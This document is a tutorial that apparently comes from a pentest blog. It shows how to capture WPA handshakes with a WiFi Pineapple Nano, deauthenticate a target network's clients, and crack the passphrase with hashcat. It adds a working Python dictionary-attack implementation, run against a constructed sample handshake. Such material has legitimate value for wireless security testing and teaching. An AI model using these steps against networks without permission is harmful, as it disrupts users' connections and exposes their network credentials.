What Do I Need?
- Any Dedicated or Virtual Server
- Kali Linux
- WiFi Pineapple Nano by Hak5
What is a WiFi Pineapple?
WiFi Pineapple by Hak5 has become the new industry standard pentest platform for penetrating WiFi and wired networks. Automate WiFi auditing with scripts and commands easily and efficiently; command the airspace with an interactive recon dashboard, and stay on-target and in-scope with the leading rogue access point suite for advanced man-in-the-middle attacks.
- Set Up WiFi Pineapple
- For the initial setup, connect the WiFi Pineapple Nano to a stable USB power supply that can deliver around 9 W. When connecting it to a PC, use the included USB Y-cable so that both plugs supply power.
- Download the latest WiFi Pineapple Nano firmware from the Hak5 Download Center.
- Plug the Nano into your computer using the included USB Y-cable.
- Head to the default landing page:
http://172.16.42.1:1471
- Follow the on-screen instructions to complete the setup. This process should only take 5-10 minutes depending on the power of your machine.
- Capturing WPA Handshakes
- Log into your administration portal.
- Select the ‘Manage Modules’ option on the left menu.
- Select ‘Get Modules from WiFiPineapple.com’.
- There are a lot of modules to pick from and the library is ever increasing in scope. Seriously. Get online and check them out.
- We want to install a module named ‘SiteSurvey’. It lists the access points transmitting around you with their SSID, MAC address, encryption method, cipher, authentication method, channel, frequency and signal quality. It is also where we capture traffic from a chosen access point and, if needed, deauthenticate its clients.
- Once the ‘SiteSurvey’ module is installed you’ll be able to access it from the left menu, under ‘Modules’.
- Click the ‘SiteSurvey’ module and any additionally required dependencies will be installed. It’s recommended to install the module to ‘Internal’ storage. It’s been reported that problems can be experienced with linking if the module dependencies are installed on ‘SD Card’ storage.
- Once the dependencies are installed new menu items will appear under the ‘SiteSurvey’ module. Before you can start to scan you need to specify the interface to be used. It’d usually be wlan0 or wlan1. Remember that the Nano has two interfaces.
- To find out which access points (APs) are nearby we can scan for APs only, or for APs together with their clients. For now, let’s scan only for APs.
- Once the nearby APs are listed, each row has several options on the far right. ‘Capture’ tunes the radio to the channel of the selected AP, highlights traffic being sent and received, and watches specifically for WPA handshakes.
- Click the ‘Capture’ button in line with the AP you’re targeting to start the capture.
- Next click on the ‘Running Processes’ menu, and you’ll see that airodump-ng is currently running.
- Once the capture begins, ‘SiteSurvey’ creates a new entry under the ‘Capture’ menu at the bottom of the interface. It updates every 5 seconds to show the number of ‘IVS’ and ‘WPA Handshakes’ captured so far (IVs only matter for WEP; for WPA/WPA2 the handshake count is what you are waiting on).
- If no handshake appears for quite some time, you can force one by sending deauthentication (‘Deauth’) frames: a disconnected client reconnects automatically and performs a fresh 4-way handshake, which the capture then records. To do this, click the ‘Deauth’ button in line with the target you’re scanning.
- Once the Deauth process starts you can confirm it is running under ‘Running Processes’, where aireplay-ng will be listed.
- Once you’ve acquired the ‘WPA Handshake’ capture, you can stop all of the other currently running processes.
- You can now view, download, or delete the current captures at the bottom of the ‘SiteSurvey’ module. Let’s download the capture and try to recover the passphrase from the recorded ‘WPA Handshake’.
- A compressed archive will be downloaded. Once unzipped you will have a handful of files; the handshake itself (the EAPOL frames of the 4-way exchange, from which the cracking tool computes and compares a MIC, rather than a stored hash) is in the .cap file.
- Cracking the Hash
- Kali Linux ships several tools for attacking WPA/WPA2 handshakes, aircrack-ng among them. One of the best is Hashcat.
- To crack a handshake with Hashcat, the .cap capture first has to be converted into a format Hashcat understands. There are two ways of doing this.
- The first is to upload the .cap file to https://hashcat.net/cap2hccapx/ for online conversion (bear in mind this hands a capture of the target network to a third party).
- The second is to download Hashcat-Utils and run its cap2hccapx tool locally.
- Once you have the converted .hccapx file, pass it to Hashcat with mode 2500 together with a wordlist. On Kali the binary is simply hashcat (hashcat64.exe is the Windows build), and without a wordlist argument hashcat does not start cracking but waits for candidates on stdin:
hashcat -m 2500 hash.hccapx wordlist.txt
- Newer Hashcat releases (6.x) have deprecated mode 2500 and the .hccapx format in favour of mode 22000, which takes a hash file produced from the .cap by hcxpcapngtool (part of hcxtools) and is otherwise run the same way.
- Now, sit back, relax, and wait. Every candidate passphrase costs 4096 PBKDF2-HMAC-SHA1 iterations, so how long this takes depends on your GPU and the size of the wordlist.
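To make concrete what Hashcat is doing with the converted handshake, and why every guess is expensive, here is an added worked example in Python. It is not code from the original post, from Hak5 or from Hashcat. It constructs its own WPA2 handshake with a known passphrase (SSID ‘ExampleNet’, passphrase ‘correct horse’, made-up MAC addresses and nonces, all assumptions of this example) and then runs a dictionary attack against it the way a cracker does against the values pulled out of the .cap: PBKDF2 to the PMK, PRF-512 to the PTK, then an HMAC over EAPOL message 2 compared against the MIC carried in that frame.

```python
"""
Worked example of the work hashcat does for one WPA2-PSK handshake.
The handshake is CONSTRUCTED locally with a known passphrase so this runs
offline; it is not a capture taken with the WiFi Pineapple.
"""
import hashlib
import hmac

MIC_OFFSET = 81   # EAPOL header (4) + descriptor fields preceding the MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    The SSID is the salt (so precomputed tables are per-SSID) and the 4096
    iterations are what make every guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK from the PMK, both MAC addresses and both nonces; all four are visible in the capture."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, keyver: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed.
    keyver 1 (WPA/TKIP) uses HMAC-MD5; keyver 2 (WPA2/CCMP) uses HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    if keyver == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if keyver == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError(f"unsupported key descriptor version {keyver}")


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, candidates):
    """Dictionary attack: for each candidate derive PMK -> PTK -> KCK and compare the MIC it
    yields with the MIC carried in message 2. Returns the passphrase, or None if not in the list."""
    keyver = int.from_bytes(eapol_msg2[5:7], "big") & 0x0007   # low 3 bits of Key Information
    target_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in candidates:
        pmk = pmk_from_passphrase(candidate, ssid)                      # the expensive step
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]     # KCK = first 128 bits of PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, keyver), target_mic):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16), key_info: int = 0x010A) -> bytes:
    """Constructed EAPOL-Key message 2 (Key Information 0x010A: descriptor version 2, Pairwise, MIC)."""
    body = (
        b"\x02"                              # descriptor type: RSN (WPA2) key
        + key_info.to_bytes(2, "big")
        + (16).to_bytes(2, "big")            # key length: 16 bytes for CCMP
        + (1).to_bytes(8, "big")             # replay counter
        + snonce                             # 32-byte SNonce
        + bytes(16) + bytes(8) + bytes(8)    # key IV, RSC, key ID (all zero in message 2)
        + mic                                # 16-byte MIC field
        + (0).to_bytes(2, "big")             # key data length (no RSN IE in this constructed frame)
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key


def build_sample_handshake(passphrase: str = "correct horse", ssid: str = "ExampleNet") -> dict:
    """Constructed sample: the fields a real .cap would supply, with a MIC from a known passphrase."""
    ap_mac = bytes.fromhex("001122334455")       # constructed BSSID (assumption)
    sta_mac = bytes.fromhex("66778899aabb")      # constructed client MAC (assumption)
    anonce = bytes(range(32))                    # constructed nonces (assumption)
    snonce = bytes(range(32, 64))
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    unsigned = build_eapol_msg2(snonce)
    msg2 = build_eapol_msg2(snonce, mic=eapol_mic(kck, unsigned, 2))
    return dict(ssid=ssid, ap_mac=ap_mac, sta_mac=sta_mac, anonce=anonce, snonce=snonce, eapol_msg2=msg2)


if __name__ == "__main__":
    hs = build_sample_handshake()
    print(crack_handshake(candidates=["password", "letmein", "correct horse", "hunter2"], **hs))
```

Run it directly and it prints the recovered passphrase. The only expensive step is pmk_from_passphrase; everything after it is a handful of HMACs. That is why Hashcat’s throughput is governed by PBKDF2-SHA1 speed on your GPU, and why a table precomputed for one SSID is useless against another.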
Conclusion
There are a lot of use cases where this knowledge becomes extremely worthwhile. However, it should always be remembered that with great knowledge comes great responsibility, which means, simply, that just because you know how to do something, you don’t do it just because you can. There’s a lot more detail we could go into with the above how-to; for example, using custom-built rainbow tables to speed up the attack (they have to be built per SSID, because the SSID salts the key derivation). But whatever way you go about recovering those WiFi passphrases, it’s likely to be computationally expensive.